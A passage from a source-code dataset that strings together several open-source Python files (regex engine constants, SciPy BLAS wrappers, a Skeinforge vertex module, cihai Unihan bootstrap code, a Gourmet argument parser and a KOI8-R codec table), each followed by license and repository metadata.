CATEGORY_UNI_SPACE = "category_uni_space"
CATEGORY_UNI_NOT_SPACE = "category_uni_not_space"
CATEGORY_UNI_WORD = "category_uni_word"
CATEGORY_UNI_NOT_WORD = "category_uni_not_word"
CATEGORY_UNI_LINEBREAK = "category_uni_linebreak"
CATEGORY_UNI_NOT_LINEBREAK = "category_uni_not_linebreak"
OPCODES = [
# failure=0 success=1 (just because it looks better that way :-)
FAILURE, SUCCESS,
ANY, ANY_ALL,
ASSERT, ASSERT_NOT,
AT,
BRANCH,
CALL,
CATEGORY,
CHARSET, BIGCHARSET,
GROUPREF, GROUPREF_EXISTS, GROUPREF_IGNORE,
IN, IN_IGNORE,
INFO,
JUMP,
LITERAL, LITERAL_IGNORE,
MARK,
MAX_UNTIL,
MIN_UNTIL,
NOT_LITERAL, NOT_LITERAL_IGNORE,
NEGATE,
RANGE,
REPEAT,
REPEAT_ONE,
SUBPATTERN,
MIN_REPEAT_ONE
]
ATCODES = [
AT_BEGINNING, AT_BEGINNING_LINE, AT_BEGINNING_STRING, AT_BOUNDARY,
AT_NON_BOUNDARY, AT_END, AT_END_LINE, AT_END_STRING,
AT_LOC_BOUNDARY, AT_LOC_NON_BOUNDARY, AT_UNI_BOUNDARY,
AT_UNI_NON_BOUNDARY
]
CHCODES = [
CATEGORY_DIGIT, CATEGORY_NOT_DIGIT, CATEGORY_SPACE,
CATEGORY_NOT_SPACE, CATEGORY_WORD, CATEGORY_NOT_WORD,
CATEGORY_LINEBREAK, CATEGORY_NOT_LINEBREAK, CATEGORY_LOC_WORD,
CATEGORY_LOC_NOT_WORD, CATEGORY_UNI_DIGIT, CATEGORY_UNI_NOT_DIGIT,
CATEGORY_UNI_SPACE, CATEGORY_UNI_NOT_SPACE, CATEGORY_UNI_WORD,
CATEGORY_UNI_NOT_WORD, CATEGORY_UNI_LINEBREAK,
CATEGORY_UNI_NOT_LINEBREAK
]
def makedict(list):
d = {}
i = 0
for item in list:
d[item] = i
i = i + 1
return d
OPCODES = makedict(OPCODES)
ATCODES = makedict(ATCODES)
CHCODES = makedict(CHCODES)
# replacement operations for "ignore case" mode
OP_IGNORE = {
GROUPREF: GROUPREF_IGNORE,
IN: IN_IGNORE,
LITERAL: LITERAL_IGNORE,
NOT_LITERAL: NOT_LITERAL_IGNORE
}
AT_MULTILINE = {
AT_BEGINNING: AT_BEGINNING_LINE,
AT_END: AT_END_LINE
}
AT_LOCALE = {
AT_BOUNDARY: AT_LOC_BOUNDARY,
AT_NON_BOUNDARY: AT_LOC_NON_BOUNDARY
}
AT_UNICODE = {
AT_BOUNDARY: AT_UNI_BOUNDARY,
AT_NON_BOUNDARY: AT_UNI_NON_BOUNDARY
}
CH_LOCALE = {
CATEGORY_DIGIT: CATEGORY_DIGIT,
CATEGORY_NOT_DIGIT: CATEGORY_NOT_DIGIT,
CATEGORY_SPACE: CATEGORY_SPACE,
CATEGORY_NOT_SPACE: CATEGORY_NOT_SPACE,
CATEGORY_WORD: CATEGORY_LOC_WORD,
CATEGORY_NOT_WORD: CATEGORY_LOC_NOT_WORD,
CATEGORY_LINEBREAK: CATEGORY_LINEBREAK,
CATEGORY_NOT_LINEBREAK: CATEGORY_NOT_LINEBREAK
}
CH_UNICODE = {
CATEGORY_DIGIT: CATEGORY_UNI_DIGIT,
CATEGORY_NOT_DIGIT: CATEGORY_UNI_NOT_DIGIT,
CATEGORY_SPACE: CATEGORY_UNI_SPACE,
CATEGORY_NOT_SPACE: CATEGORY_UNI_NOT_SPACE,
CATEGORY_WORD: CATEGORY_UNI_WORD,
CATEGORY_NOT_WORD: CATEGORY_UNI_NOT_WORD,
CATEGORY_LINEBREAK: CATEGORY_UNI_LINEBREAK,
CATEGORY_NOT_LINEBREAK: CATEGORY_UNI_NOT_LINEBREAK
}
# flags
SRE_FLAG_TEMPLATE = 1 # template mode (disable backtracking)
SRE_FLAG_IGNORECASE = 2 # case insensitive
SRE_FLAG_LOCALE = 4 # honour system locale
SRE_FLAG_MULTILINE = 8 # treat target as multiline string
SRE_FLAG_DOTALL = 16 # treat target as a single string
SRE_FLAG_UNICODE = 32 # use unicode locale
SRE_FLAG_VERBOSE = 64 # ignore whitespace and comments
SRE_FLAG_DEBUG = 128 # debugging
# flags for INFO primitive
SRE_INFO_PREFIX = 1 # has prefix
SRE_INFO_LITERAL = 2 # entire pattern is literal (given by prefix)
SRE_INFO_CHARSET = 4 # pattern starts with character from given set
if __name__ == "__main__":
def dump(f, d, prefix):
items = d.items()
items.sort(key=lambda a: a[1])
for k, v in items:
f.write("#define %s_%s %s\n" % (prefix, k.upper(), v))
f = open("sre_constants.h", "w")
f.write("""\
/*
* Secret Labs' Regular Expression Engine
*
* regular expression matching engine
*
* NOTE: This file is generated by sre_constants.py. If you need
* to change anything in here, edit sre_constants.py and run it.
*
* Copyright (c) 1997-2001 by Secret Labs AB. All rights reserved.
*
* See the _sre.c file for information on usage and redistribution.
*/
""")
f.write("#define SRE_MAGIC %d\n" % MAGIC)
dump(f, OPCODES, "SRE_OP")
dump(f, ATCODES, "SRE")
dump(f, CHCODES, "SRE")
f.write("#define SRE_FLAG_TEMPLATE %d\n" % SRE_FLAG_TEMPLATE)
f.write("#define SRE_FLAG_IGNORECASE %d\n" % SRE_FLAG_IGNORECASE)
f.write("#define SRE_FLAG_LOCALE %d\n" % SRE_FLAG_LOCALE)
f.write("#define SRE_FLAG_MULTILINE %d\n" % SRE_FLAG_MULTILINE)
f.write("#define SRE_FLAG_DOTALL %d\n" % SRE_FLAG_DOTALL)
f.write("#define SRE_FLAG_UNICODE %d\n" % SRE_FLAG_UNICODE)
f.write("#define SRE_FLAG_VERBOSE %d\n" % SRE_FLAG_VERBOSE)
f.write("#define SRE_INFO_PREFIX %d\n" % SRE_INFO_PREFIX)
f.write("#define SRE_INFO_LITERAL %d\n" % SRE_INFO_LITERAL)
f.write("#define SRE_INFO_CHARSET %d\n" % SRE_INFO_CHARSET)
f.close()
print "done"
|
gpl-3.0
|
DailyActie/Surrogate-Model
|
01-codes/scipy-master/scipy/linalg/blas.py
|
1
|
6822
|
"""
Low-level BLAS functions (:mod:`scipy.linalg.blas`)
===================================================
This module contains low-level functions from the BLAS library.
.. versionadded:: 0.12.0
.. warning::
These functions do little to no error checking.
It is possible to cause crashes by mis-using them,
so prefer using the higher-level routines in `scipy.linalg`.
Finding functions
-----------------
.. autosummary::
:toctree: generated/
get_blas_funcs
find_best_blas_type
BLAS Level 1 functions
----------------------
.. autosummary::
:toctree: generated/
caxpy
ccopy
cdotc
cdotu
crotg
cscal
csrot
csscal
cswap
dasum
daxpy
dcopy
ddot
dnrm2
drot
drotg
drotm
drotmg
dscal
dswap
dzasum
dznrm2
icamax
idamax
isamax
izamax
sasum
saxpy
scasum
scnrm2
scopy
sdot
snrm2
srot
srotg
srotm
srotmg
sscal
sswap
zaxpy
zcopy
zdotc
zdotu
zdrot
zdscal
zrotg
zscal
zswap
BLAS Level 2 functions
----------------------
.. autosummary::
:toctree: generated/
cgemv
cgerc
cgeru
chemv
ctrmv
csyr
cher
cher2
dgemv
dger
dsymv
dtrmv
dsyr
dsyr2
sgemv
sger
ssymv
strmv
ssyr
ssyr2
zgemv
zgerc
zgeru
zhemv
ztrmv
zsyr
zher
zher2
BLAS Level 3 functions
----------------------
.. autosummary::
:toctree: generated/
cgemm
chemm
cherk
cher2k
csymm
csyrk
csyr2k
dgemm
dsymm
dsyrk
dsyr2k
sgemm
ssymm
ssyrk
ssyr2k
zgemm
zhemm
zherk
zher2k
zsymm
zsyrk
zsyr2k
"""
#
# Author: Pearu Peterson, March 2002
# refactoring by Fabian Pedregosa, March 2010
#
from __future__ import division, print_function, absolute_import
__all__ = ['get_blas_funcs', 'find_best_blas_type']
import numpy as _np
from scipy.linalg import _fblas
try:
from scipy.linalg import _cblas
except ImportError:
_cblas = None
# Expose all functions (only fblas --- cblas is an implementation detail)
empty_module = None
del empty_module
# 'd' will be default for 'i',..
_type_conv = {'f': 's', 'd': 'd', 'F': 'c', 'D': 'z', 'G': 'z'}
# some convenience alias for complex functions
_blas_alias = {'cnrm2': 'scnrm2', 'znrm2': 'dznrm2',
'cdot': 'cdotc', 'zdot': 'zdotc',
'cger': 'cgerc', 'zger': 'zgerc',
'sdotc': 'sdot', 'sdotu': 'sdot',
'ddotc': 'ddot', 'ddotu': 'ddot'}
def find_best_blas_type(arrays=(), dtype=None):
"""Find best-matching BLAS/LAPACK type.
Arrays are used to determine the optimal prefix of BLAS routines.
Parameters
----------
arrays : sequence of ndarrays, optional
Arrays can be given to determine optimal prefix of BLAS
routines. If not given, double-precision routines will be
used, otherwise the most generic type in arrays will be used.
dtype : str or dtype, optional
Data-type specifier. Not used if `arrays` is non-empty.
Returns
-------
prefix : str
BLAS/LAPACK prefix character.
dtype : dtype
Inferred Numpy data type.
prefer_fortran : bool
Whether to prefer Fortran order routines over C order.
"""
dtype = _np.dtype(dtype)
prefer_fortran = False
if arrays:
# use the most generic type in arrays
dtypes = [ar.dtype for ar in arrays]
dtype = _np.find_common_type(dtypes, ())
try:
index = dtypes.index(dtype)
except ValueError:
index = 0
if arrays[index].flags['FORTRAN']:
# prefer Fortran for leading array with column major order
prefer_fortran = True
prefix = _type_conv.get(dtype.char, 'd')
if dtype.char == 'G':
# complex256 -> complex128 (i.e., C long double -> C double)
dtype = _np.dtype('D')
elif dtype.char not in 'fdFD':
dtype = _np.dtype('d')
return prefix, dtype, prefer_fortran
def _get_funcs(names, arrays, dtype,
lib_name, fmodule, cmodule,
fmodule_name, cmodule_name, alias):
"""
Return available BLAS/LAPACK functions.
Used also in lapack.py. See get_blas_funcs for docstring.
"""
funcs = []
unpack = False
dtype = _np.dtype(dtype)
module1 = (cmodule, cmodule_name)
module2 = (fmodule, fmodule_name)
if isinstance(names, str):
names = (names,)
unpack = True
prefix, dtype, prefer_fortran = find_best_blas_type(arrays, dtype)
if prefer_fortran:
module1, module2 = module2, module1
for i, name in enumerate(names):
func_name = prefix + name
func_name = alias.get(func_name, func_name)
func = getattr(module1[0], func_name, None)
module_name = module1[1]
if func is None:
func = getattr(module2[0], func_name, None)
module_name = module2[1]
if func is None:
raise ValueError(
'%s function %s could not be found' % (lib_name, func_name))
func.module_name, func.typecode = module_name, prefix
func.dtype = dtype
func.prefix = prefix # Backward compatibility
funcs.append(func)
if unpack:
return funcs[0]
else:
return funcs
def get_blas_funcs(names, arrays=(), dtype=None):
"""Return available BLAS function objects from names.
Arrays are used to determine the optimal prefix of BLAS routines.
Parameters
----------
names : str or sequence of str
Name(s) of BLAS functions without type prefix.
arrays : sequence of ndarrays, optional
Arrays can be given to determine optimal prefix of BLAS
routines. If not given, double-precision routines will be
used, otherwise the most generic type in arrays will be used.
dtype : str or dtype, optional
Data-type specifier. Not used if `arrays` is non-empty.
Returns
-------
funcs : list
List containing the found function(s).
Notes
-----
This routine automatically chooses between Fortran/C
interfaces. Fortran code is used whenever possible for arrays with
column major order. In all other cases, C code is preferred.
In BLAS, the naming convention is that all functions start with a
type prefix, which depends on the type of the principal
matrix. These can be one of {'s', 'd', 'c', 'z'} for the numpy
types {float32, float64, complex64, complex128} respectively.
The code and the dtype are stored in attributes `typecode` and `dtype`
of the returned functions.
"""
return _get_funcs(names, arrays, dtype,
"BLAS", _fblas, _cblas, "fblas", "cblas",
_blas_alias)
|
mit
|
jetty840/ReplicatorG
|
skein_engines/skeinforge-50/fabmetheus_utilities/geometry/geometry_tools/vertex.py
|
13
|
1524
|
"""
Vertex of a triangle mesh.
"""
from __future__ import absolute_import
#Init has to be imported first because it has code to workaround the python bug where relative imports don't work if the module is imported as a main module.
import __init__
from fabmetheus_utilities.geometry.geometry_utilities import evaluate
from fabmetheus_utilities import xml_simple_reader
__author__ = 'Enrique Perez ([email protected])'
__credits__ = 'Art of Illusion <http://www.artofillusion.org/>'
__date__ = '$Date: 2008/02/05 $'
__license__ = 'GNU Affero General Public License http://www.gnu.org/licenses/agpl.html'
def addGeometryList(elementNode, vertexes):
"Add vertex elements to an xml element."
for vertex in vertexes:
vertexElement = getUnboundVertexElement(vertex)
vertexElement.parentNode = elementNode
elementNode.childNodes.append( vertexElement )
def addVertexToAttributes(attributes, vertex):
"Add to the attribute dictionary."
if vertex.x != 0.0:
attributes['x'] = str(vertex.x)
if vertex.y != 0.0:
attributes['y'] = str(vertex.y)
if vertex.z != 0.0:
attributes['z'] = str(vertex.z)
def getUnboundVertexElement(vertex):
"Add vertex element to an xml element."
vertexElement = xml_simple_reader.ElementNode()
addVertexToAttributes(vertexElement.attributes, vertex)
vertexElement.localName = 'vertex'
return vertexElement
def processElementNode(elementNode):
"Process the xml element."
elementNode.parentNode.xmlObject.vertexes.append(evaluate.getVector3FromElementNode(elementNode))
|
gpl-2.0
|
cihai/cihai-python
|
cihai/data/unihan/bootstrap.py
|
1
|
2283
|
# -*- coding: utf8 - *-
from __future__ import absolute_import, print_function, unicode_literals
from sqlalchemy import Column, String, Table
from unihan_etl import process as unihan
from unihan_etl.process import UNIHAN_MANIFEST
from ...utils import merge_dict
from .constants import UNIHAN_ETL_DEFAULT_OPTIONS, UNIHAN_FIELDS
def bootstrap_unihan(metadata, options={}):
"""Download, extract and import unihan to database."""
options = merge_dict(UNIHAN_ETL_DEFAULT_OPTIONS.copy(), options)
p = unihan.Packager(options)
p.download()
data = p.export()
table = create_unihan_table(UNIHAN_FIELDS, metadata)
metadata.create_all()
metadata.bind.execute(table.insert(), data)
TABLE_NAME = 'Unihan'
def flatten_datasets(d):
return sorted({c for cs in d.values() for c in cs})
DEFAULT_COLUMNS = ['ucn', 'char']
try:
DEFAULT_FIELDS = [f for t, f in UNIHAN_MANIFEST.items() if t in ['Unihan']]
except Exception:
DEFAULT_FIELDS = [f for t, f in UNIHAN_MANIFEST.items()]
def is_bootstrapped(metadata):
"""Return True if cihai is correctly bootstrapped."""
fields = UNIHAN_FIELDS + DEFAULT_COLUMNS
if TABLE_NAME in metadata.tables.keys():
table = metadata.tables[TABLE_NAME]
if set(fields) == set(c.name for c in table.columns):
return True
else:
return False
else:
return False
def create_unihan_table(columns, metadata):
"""Create table and return :class:`sqlalchemy.Table`.
Parameters
----------
columns : list
columns for table, e.g. ``['kDefinition', 'kCantonese']``
metadata : :class:`sqlalchemy.schema.MetaData`
Instance of sqlalchemy metadata
Returns
-------
:class:`sqlalchemy.schema.Table` :
Newly created table with columns and index.
"""
if TABLE_NAME not in metadata.tables:
table = Table(TABLE_NAME, metadata)
table.append_column(Column('char', String(12), primary_key=True))
table.append_column(Column('ucn', String(12), primary_key=True))
for column_name in columns:
col = Column(column_name, String(256), nullable=True)
table.append_column(col)
return table
else:
return Table(TABLE_NAME, metadata)
|
bsd-3-clause
|
Ceciliae/gourmet
|
gourmet/OptionParser.py
|
6
|
2260
|
import argparse
import version
try:
import argcomplete
has_argcomplete = True
except ImportError:
has_argcomplete = False
parser = argparse.ArgumentParser(prog='gourmet',description=version.description)
parser.add_argument('--version',action='version',version=version.version)
parser.add_argument('--database-url',action='store',dest='db_url',
help='Custom url for database of form driver://args/location',default='')
parser.add_argument('--plugin-directory',action='store',dest='html_plugin_dir',
help='Directory for webpage import filter plugins.',default='')
parser.add_argument('--use-threads',action='store_const',const=True,dest='threads',
help='Enable threading support.',default=False)
parser.add_argument('--disable-threads',action='store_const',const=False,dest='threads',
help='Disable threading support.')
parser.add_argument('--gourmet-directory',action='store',dest='gourmetdir',
help='Gourmet configuration directory',default='')
parser.add_argument('--debug-threading-interval',action='store',type=float,dest='thread_debug_interval',
help='Interval for threading debug calls',default=5.0)
parser.add_argument('--debug-threading',action='store_true',dest='thread_debug',
help='Print debugging information about threading.')
parser.add_argument('--debug-file',action='store',dest='debug_file',
help='Regular expression that matches filename(s) containing code for which we want to display debug messages.',
default='')
parser.add_argument('--showtimes',action='store_true',dest='time',help='Print timestamps on debug statements.')
parser.add_argument('--disable-psyco',dest='psyco',action='store_false',help='Do not use psyco if it is installed.',
default=True)
group = parser.add_mutually_exclusive_group()
group.add_argument('-q',action='store_const',const=-1,dest='debug',help='Don\'t print gourmet error messages')
group.add_argument('-v',action='count',dest='debug',help='Be verbose (extra v\'s will increase the verbosity level')
if has_argcomplete:
argcomplete.autocomplete(parser)
args = parser.parse_args()
|
gpl-2.0
|
vipulkanade/EventbriteDjango
|
lib/python2.7/encodings/koi8_r.py
|
593
|
14035
|
""" Python Character Mapping Codec koi8_r generated from 'MAPPINGS/VENDORS/MISC/KOI8-R.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_table)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='koi8-r',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Table
decoding_table = (
u'\x00' # 0x00 -> NULL
u'\x01' # 0x01 -> START OF HEADING
u'\x02' # 0x02 -> START OF TEXT
u'\x03' # 0x03 -> END OF TEXT
u'\x04' # 0x04 -> END OF TRANSMISSION
u'\x05' # 0x05 -> ENQUIRY
u'\x06' # 0x06 -> ACKNOWLEDGE
u'\x07' # 0x07 -> BELL
u'\x08' # 0x08 -> BACKSPACE
u'\t' # 0x09 -> HORIZONTAL TABULATION
u'\n' # 0x0A -> LINE FEED
u'\x0b' # 0x0B -> VERTICAL TABULATION
u'\x0c' # 0x0C -> FORM FEED
u'\r' # 0x0D -> CARRIAGE RETURN
u'\x0e' # 0x0E -> SHIFT OUT
u'\x0f' # 0x0F -> SHIFT IN
u'\x10' # 0x10 -> DATA LINK ESCAPE
u'\x11' # 0x11 -> DEVICE CONTROL ONE
u'\x12' # 0x12 -> DEVICE CONTROL TWO
u'\x13' # 0x13 -> DEVICE CONTROL THREE
u'\x14' # 0x14 -> DEVICE CONTROL FOUR
u'\x15' # 0x15 -> NEGATIVE ACKNOWLEDGE
u'\x16' # 0x16 -> SYNCHRONOUS IDLE
u'\x17' # 0x17 -> END OF TRANSMISSION BLOCK
u'\x18' # 0x18 -> CANCEL
u'\x19' # 0x19 -> END OF MEDIUM
u'\x1a' # 0x1A -> SUBSTITUTE
u'\x1b' # 0x1B -> ESCAPE
u'\x1c' # 0x1C -> FILE SEPARATOR
u'\x1d' # 0x1D -> GROUP SEPARATOR
u'\x1e' # 0x1E -> RECORD SEPARATOR
u'\x1f' # 0x1F -> UNIT SEPARATOR
u' ' # 0x20 -> SPACE
u'!' # 0x21 -> EXCLAMATION MARK
u'"' # 0x22 -> QUOTATION MARK
u'#' # 0x23 -> NUMBER SIGN
u'$' # 0x24 -> DOLLAR SIGN
u'%' # 0x25 -> PERCENT SIGN
u'&' # 0x26 -> AMPERSAND
u"'" # 0x27 -> APOSTROPHE
u'(' # 0x28 -> LEFT PARENTHESIS
u')' # 0x29 -> RIGHT PARENTHESIS
u'*' # 0x2A -> ASTERISK
u'+' # 0x2B -> PLUS SIGN
u',' # 0x2C -> COMMA
u'-' # 0x2D -> HYPHEN-MINUS
u'.' # 0x2E -> FULL STOP
u'/' # 0x2F -> SOLIDUS
u'0' # 0x30 -> DIGIT ZERO
u'1' # 0x31 -> DIGIT ONE
u'2' # 0x32 -> DIGIT TWO
u'3' # 0x33 -> DIGIT THREE
u'4' # 0x34 -> DIGIT FOUR
u'5' # 0x35 -> DIGIT FIVE
u'6' # 0x36 -> DIGIT SIX
u'7' # 0x37 -> DIGIT SEVEN
u'8' # 0x38 -> DIGIT EIGHT
u'9' # 0x39 -> DIGIT NINE
u':' # 0x3A -> COLON
u';' # 0x3B -> SEMICOLON
u'<' # 0x3C -> LESS-THAN SIGN
u'=' # 0x3D -> EQUALS SIGN
u'>' # 0x3E -> GREATER-THAN SIGN
u'?' # 0x3F -> QUESTION MARK
u'@' # 0x40 -> COMMERCIAL AT
u'A' # 0x41 -> LATIN CAPITAL LETTER A
u'B' # 0x42 -> LATIN CAPITAL LETTER B
u'C' # 0x43 -> LATIN CAPITAL LETTER C
u'D' # 0x44 -> LATIN CAPITAL LETTER D
u'E' # 0x45 -> LATIN CAPITAL LETTER E
u'F' # 0x46 -> LATIN CAPITAL LETTER F
u'G' # 0x47 -> LATIN CAPITAL LETTER G
u'H' # 0x48 -> LATIN CAPITAL LETTER H
u'I' # 0x49 -> LATIN CAPITAL LETTER I
u'J' # 0x4A -> LATIN CAPITAL LETTER J
u'K' # 0x4B -> LATIN CAPITAL LETTER K
u'L' # 0x4C -> LATIN CAPITAL LETTER L
u'M' # 0x4D -> LATIN CAPITAL LETTER M
u'N' # 0x4E -> LATIN CAPITAL LETTER N
u'O' # 0x4F -> LATIN CAPITAL LETTER O
u'P' # 0x50 -> LATIN CAPITAL LETTER P
u'Q' # 0x51 -> LATIN CAPITAL LETTER Q
u'R' # 0x52 -> LATIN CAPITAL LETTER R
u'S' # 0x53 -> LATIN CAPITAL LETTER S
u'T' # 0x54 -> LATIN CAPITAL LETTER T
u'U' # 0x55 -> LATIN CAPITAL LETTER U
u'V' # 0x56 -> LATIN CAPITAL LETTER V
u'W' # 0x57 -> LATIN CAPITAL LETTER W
u'X' # 0x58 -> LATIN CAPITAL LETTER X
u'Y' # 0x59 -> LATIN CAPITAL LETTER Y
u'Z' # 0x5A -> LATIN CAPITAL LETTER Z
u'[' # 0x5B -> LEFT SQUARE BRACKET
u'\\' # 0x5C -> REVERSE SOLIDUS
u']' # 0x5D -> RIGHT SQUARE BRACKET
u'^' # 0x5E -> CIRCUMFLEX ACCENT
u'_' # 0x5F -> LOW LINE
u'`' # 0x60 -> GRAVE ACCENT
u'a' # 0x61 -> LATIN SMALL LETTER A
u'b' # 0x62 -> LATIN SMALL LETTER B
u'c' # 0x63 -> LATIN SMALL LETTER C
u'd' # 0x64 -> LATIN SMALL LETTER D
u'e' # 0x65 -> LATIN SMALL LETTER E
u'f' # 0x66 -> LATIN SMALL LETTER F
u'g' # 0x67 -> LATIN SMALL LETTER G
u'h' # 0x68 -> LATIN SMALL LETTER H
u'i' # 0x69 -> LATIN SMALL LETTER I
u'j' # 0x6A -> LATIN SMALL LETTER J
u'k' # 0x6B -> LATIN SMALL LETTER K
u'l' # 0x6C -> LATIN SMALL LETTER L
u'm' # 0x6D -> LATIN SMALL LETTER M
u'n' # 0x6E -> LATIN SMALL LETTER N
u'o' # 0x6F -> LATIN SMALL LETTER O
u'p' # 0x70 -> LATIN SMALL LETTER P
u'q' # 0x71 -> LATIN SMALL LETTER Q
u'r' # 0x72 -> LATIN SMALL LETTER R
u's' # 0x73 -> LATIN SMALL LETTER S
u't' # 0x74 -> LATIN SMALL LETTER T
u'u' # 0x75 -> LATIN SMALL LETTER U
u'v' # 0x76 -> LATIN SMALL LETTER V
u'w' # 0x77 -> LATIN SMALL LETTER W
u'x' # 0x78 -> LATIN SMALL LETTER X
u'y' # 0x79 -> LATIN SMALL LETTER Y
u'z' # 0x7A -> LATIN SMALL LETTER Z
u'{' # 0x7B -> LEFT CURLY BRACKET
u'|' # 0x7C -> VERTICAL LINE
u'}' # 0x7D -> RIGHT CURLY BRACKET
u'~' # 0x7E -> TILDE
u'\x7f' # 0x7F -> DELETE
u'\u2500' # 0x80 -> BOX DRAWINGS LIGHT HORIZONTAL
u'\u2502' # 0x81 -> BOX DRAWINGS LIGHT VERTICAL
u'\u250c' # 0x82 -> BOX DRAWINGS LIGHT DOWN AND RIGHT
u'\u2510' # 0x83 -> BOX DRAWINGS LIGHT DOWN AND LEFT
u'\u2514' # 0x84 -> BOX DRAWINGS LIGHT UP AND RIGHT
u'\u2518' # 0x85 -> BOX DRAWINGS LIGHT UP AND LEFT
u'\u251c' # 0x86 -> BOX DRAWINGS LIGHT VERTICAL AND RIGHT
u'\u2524' # 0x87 -> BOX DRAWINGS LIGHT VERTICAL AND LEFT
u'\u252c' # 0x88 -> BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
u'\u2534' # 0x89 -> BOX DRAWINGS LIGHT UP AND HORIZONTAL
u'\u253c' # 0x8A -> BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
u'\u2580' # 0x8B -> UPPER HALF BLOCK
u'\u2584' # 0x8C -> LOWER HALF BLOCK
u'\u2588' # 0x8D -> FULL BLOCK
u'\u258c' # 0x8E -> LEFT HALF BLOCK
u'\u2590' # 0x8F -> RIGHT HALF BLOCK
u'\u2591' # 0x90 -> LIGHT SHADE
u'\u2592' # 0x91 -> MEDIUM SHADE
u'\u2593' # 0x92 -> DARK SHADE
u'\u2320' # 0x93 -> TOP HALF INTEGRAL
u'\u25a0' # 0x94 -> BLACK SQUARE
u'\u2219' # 0x95 -> BULLET OPERATOR
u'\u221a' # 0x96 -> SQUARE ROOT
u'\u2248' # 0x97 -> ALMOST EQUAL TO
u'\u2264' # 0x98 -> LESS-THAN OR EQUAL TO
u'\u2265' # 0x99 -> GREATER-THAN OR EQUAL TO
u'\xa0' # 0x9A -> NO-BREAK SPACE
u'\u2321' # 0x9B -> BOTTOM HALF INTEGRAL
u'\xb0' # 0x9C -> DEGREE SIGN
u'\xb2' # 0x9D -> SUPERSCRIPT TWO
u'\xb7' # 0x9E -> MIDDLE DOT
u'\xf7' # 0x9F -> DIVISION SIGN
u'\u2550' # 0xA0 -> BOX DRAWINGS DOUBLE HORIZONTAL
u'\u2551' # 0xA1 -> BOX DRAWINGS DOUBLE VERTICAL
u'\u2552' # 0xA2 -> BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
u'\u0451' # 0xA3 -> CYRILLIC SMALL LETTER IO
u'\u2553' # 0xA4 -> BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
u'\u2554' # 0xA5 -> BOX DRAWINGS DOUBLE DOWN AND RIGHT
u'\u2555' # 0xA6 -> BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
u'\u2556' # 0xA7 -> BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
u'\u2557' # 0xA8 -> BOX DRAWINGS DOUBLE DOWN AND LEFT
u'\u2558' # 0xA9 -> BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
u'\u2559' # 0xAA -> BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
u'\u255a' # 0xAB -> BOX DRAWINGS DOUBLE UP AND RIGHT
u'\u255b' # 0xAC -> BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
u'\u255c' # 0xAD -> BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
u'\u255d' # 0xAE -> BOX DRAWINGS DOUBLE UP AND LEFT
u'\u255e' # 0xAF -> BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
u'\u255f' # 0xB0 -> BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
u'\u2560' # 0xB1 -> BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
u'\u2561' # 0xB2 -> BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
u'\u0401' # 0xB3 -> CYRILLIC CAPITAL LETTER IO
u'\u2562' # 0xB4 -> BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
u'\u2563' # 0xB5 -> BOX DRAWINGS DOUBLE VERTICAL AND LEFT
u'\u2564' # 0xB6 -> BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
u'\u2565' # 0xB7 -> BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
u'\u2566' # 0xB8 -> BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
u'\u2567' # 0xB9 -> BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
u'\u2568' # 0xBA -> BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
u'\u2569' # 0xBB -> BOX DRAWINGS DOUBLE UP AND HORIZONTAL
u'\u256a' # 0xBC -> BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
u'\u256b' # 0xBD -> BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
u'\u256c' # 0xBE -> BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
u'\xa9' # 0xBF -> COPYRIGHT SIGN
u'\u044e' # 0xC0 -> CYRILLIC SMALL LETTER YU
u'\u0430' # 0xC1 -> CYRILLIC SMALL LETTER A
u'\u0431' # 0xC2 -> CYRILLIC SMALL LETTER BE
u'\u0446' # 0xC3 -> CYRILLIC SMALL LETTER TSE
u'\u0434' # 0xC4 -> CYRILLIC SMALL LETTER DE
u'\u0435' # 0xC5 -> CYRILLIC SMALL LETTER IE
u'\u0444' # 0xC6 -> CYRILLIC SMALL LETTER EF
u'\u0433' # 0xC7 -> CYRILLIC SMALL LETTER GHE
u'\u0445' # 0xC8 -> CYRILLIC SMALL LETTER HA
u'\u0438' # 0xC9 -> CYRILLIC SMALL LETTER I
u'\u0439' # 0xCA -> CYRILLIC SMALL LETTER SHORT I
u'\u043a' # 0xCB -> CYRILLIC SMALL LETTER KA
u'\u043b' # 0xCC -> CYRILLIC SMALL LETTER EL
u'\u043c' # 0xCD -> CYRILLIC SMALL LETTER EM
u'\u043d' # 0xCE -> CYRILLIC SMALL LETTER EN
u'\u043e' # 0xCF -> CYRILLIC SMALL LETTER O
